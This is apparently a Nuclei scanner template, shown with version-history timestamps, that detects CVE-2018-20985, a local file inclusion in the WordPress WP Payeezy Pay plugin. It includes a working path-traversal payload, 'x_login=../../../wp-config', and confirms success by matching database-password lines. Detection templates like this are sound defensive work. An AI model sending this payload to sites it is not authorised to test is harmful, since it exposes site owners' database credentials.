2021-07-22 08:35:12 +00:00
id : CVE-2018-20985
info :
2022-05-13 20:26:43 +00:00
name : WordPress Payeezy Pay <=2.97 - Local File Inclusion
2021-07-22 08:35:12 +00:00
author : daffainfo
2022-04-22 10:38:41 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 08:37:50 +00:00
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
2022-05-13 20:26:43 +00:00
- https://wordpress.org/plugins/wp-payeezy-pay/#developers
2022-09-23 17:53:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20985
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20985
cwe-id : CWE-20
2023-07-11 19:49:27 +00:00
epss-score : 0.01113
cpe : cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.82735
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : payeezy
product : wp_payeezy_pay
tags : cve,cve2018,wordpress,lfi,plugin
2021-07-22 08:35:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 08:35:12 +00:00
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
2021-07-22 13:31:00 +00:00
body : "x_login=../../../wp-config"
2021-07-22 08:35:12 +00:00
matchers-condition : and
matchers :
2021-07-22 12:32:43 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-22 12:32:43 +00:00
words :
2021-07-22 13:31:00 +00:00
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition : and
2023-07-11 19:49:27 +00:00
2021-07-22 08:35:12 +00:00
- type : status
status :
- 200